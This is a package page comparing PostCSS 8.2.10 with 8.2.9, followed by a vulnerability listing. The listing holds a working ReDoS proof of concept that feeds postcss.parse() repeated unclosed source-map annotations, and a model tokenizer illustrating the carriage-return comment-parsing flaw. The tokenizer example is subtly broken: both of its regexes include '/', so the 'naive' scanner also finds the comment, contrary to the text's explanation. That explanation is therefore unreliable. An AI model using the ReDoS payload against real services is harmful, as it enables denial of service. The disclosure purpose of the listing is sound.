PostCSS 8.2.10 is a patch release of the popular JavaScript tool for transforming styles with plugins. It builds directly on 8.2.9: both versions share the same core dependencies (nanoid, colorette, source-map), the same exported functionality, the MIT license, and the same repository, author, and funding metadata. The visible difference lies in the dist object: 8.2.10 has a slightly larger unpacked size of 179759 bytes versus 179381 bytes for 8.2.9, consistent with a small internal change rather than a new feature.
The release dates also differ. Version 8.2.10 was published on April 11, 2021, and 8.2.9 on March 30, 2021, so 8.2.10 carries whatever fixes landed in that two-week window. For developers who hit problems with 8.2.9 the upgrade is worthwhile; for everyone else the practical impact is small. Note, however, that both 8.2.9 and 8.2.10 fall inside the affected ranges of the vulnerabilities listed below, so neither version is the one a security-conscious project should settle on.
All vulnerabilities affecting version 8.2.10 of the package
Regular Expression Denial of Service in postcss
The package postcss in versions before 7.0.36, and from 8.0.0 up to but excluding 8.2.13, is vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. These functions look for a source-map annotation comment in the input CSS before it is parsed. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s*# sourceMappingURL=(.*)
whose greedy (.*) must backtrack across the rest of the input for every annotation prefix it finds, so an input that repeats the prefix without ever closing the comment costs time that grows quadratically with its length. The proof of concept below feeds such inputs to postcss.parse() and prints the time each one takes:
var postcss = require("postcss")

// Build "a{}" followed by n unterminated source-map annotations.
function build_attack(n) {
  var ret = "a{}"
  for (var i = 0; i < n; i++) {
    ret += "/*# sourceMappingURL="
  }
  return ret + "!";
}

// Warm-up parse of a well-formed annotation.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */')

for (var i = 1; i <= 500000; i++) {
  if (i % 1000 == 0) {
    var time = Date.now();
    var attack_str = build_attack(i)
    try {
      postcss.parse(attack_str)
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    } catch (e) {
      // The unclosed comment makes parse() throw; the elapsed time is recorded either way.
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    }
  }
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters that use PostCSS to parse external Cascading Style Sheets (CSS). Input containing a carriage return (\r) can be parsed differently by PostCSS than by other CSS consumers, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external, untrusted CSS. An attacker can prepare CSS in such a way that it contains parts PostCSS parses as a CSS comment. After processing by PostCSS, that content is included in the output as CSS nodes (rules, properties) even though it was originally inside a comment, so a linter or sanitizer built on PostCSS does not see the same stylesheet a browser will.
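The example below is added here and is not PostCSS's tokenizer. It models the kind of line-terminator mismatch behind the demonstration string: a scanner that treats only "\n" as a line break when deciding whether "(...)" is a single bracket token swallows "(\r/*)" whole and never sees the "/*" as a comment opener, while a scanner that also counts "\r" rejects the bracket and finds the comment. The two regexes are assumed shapes chosen to illustrate the point, not copies of PostCSS code.

```javascript
// Added example, not PostCSS source. BAD_BRACKET_NAIVE and BAD_BRACKET_FIXED are
// assumed patterns that stand in for "LF-only" versus "CR and LF" handling.

// A "(...)" run is kept as one bracket token only if it contains none of these.
// Naive: only LF ends a line, so "\r" slips through.
const BAD_BRACKET_NAIVE = /.[\n"'(/\\]/;
// Hardened: CR is a line terminator as well (CSS preprocessing maps CR and CRLF to LF).
const BAD_BRACKET_FIXED = /.[\r\n"'(/\\]/;

// Coarse tokenizer: returns {type, text} for "comment", "brackets" and "other".
function tokenize(css, badBracket) {
  const tokens = [];
  let i = 0;
  while (i < css.length) {
    const c = css[i];
    if (c === "/" && css[i + 1] === "*") {
      // Comment runs to the next "*/" or, if unterminated, to end of input.
      const end = css.indexOf("*/", i + 2);
      const stop = end === -1 ? css.length : end + 2;
      tokens.push({ type: "comment", text: css.slice(i, stop) });
      i = stop;
    } else if (c === "(") {
      // Try to take the whole "(...)" as one token unless its content is "bad".
      const close = css.indexOf(")", i);
      const inner = close === -1 ? null : css.slice(i, close + 1);
      if (inner !== null && !badBracket.test(inner)) {
        tokens.push({ type: "brackets", text: inner });
        i = close + 1;
      } else {
        tokens.push({ type: "other", text: c });
        i++;
      }
    } else {
      tokens.push({ type: "other", text: c });
      i++;
    }
  }
  return tokens;
}

// Texts of all comment tokens the scanner found.
function comments(css, badBracket) {
  return tokenize(css, badBracket)
    .filter((t) => t.type === "comment")
    .map((t) => t.text);
}

// Constructed sample: the advisory's demonstration string.
const PAYLOAD = "@font-face{ font:(\r/*);}";
console.log("naive comments:", JSON.stringify(comments(PAYLOAD, BAD_BRACKET_NAIVE)));
console.log("fixed comments:", JSON.stringify(comments(PAYLOAD, BAD_BRACKET_FIXED)));
```

With the naive pattern the payload yields no comment at all and "(\r/*)" is emitted as an ordinary bracket token, so everything after it is treated as live CSS; with the hardened pattern the "/*" opens a comment that consumes ");}" to the end of input. Two consumers that disagree on which of these readings is right will disagree on what the stylesheet contains, which is exactly the gap a linter built on the naive reading cannot close. The practical check for any CSS-handling tool is to run it on inputs using "\r", "\r\n" and "\f" as line breaks, not just "\n".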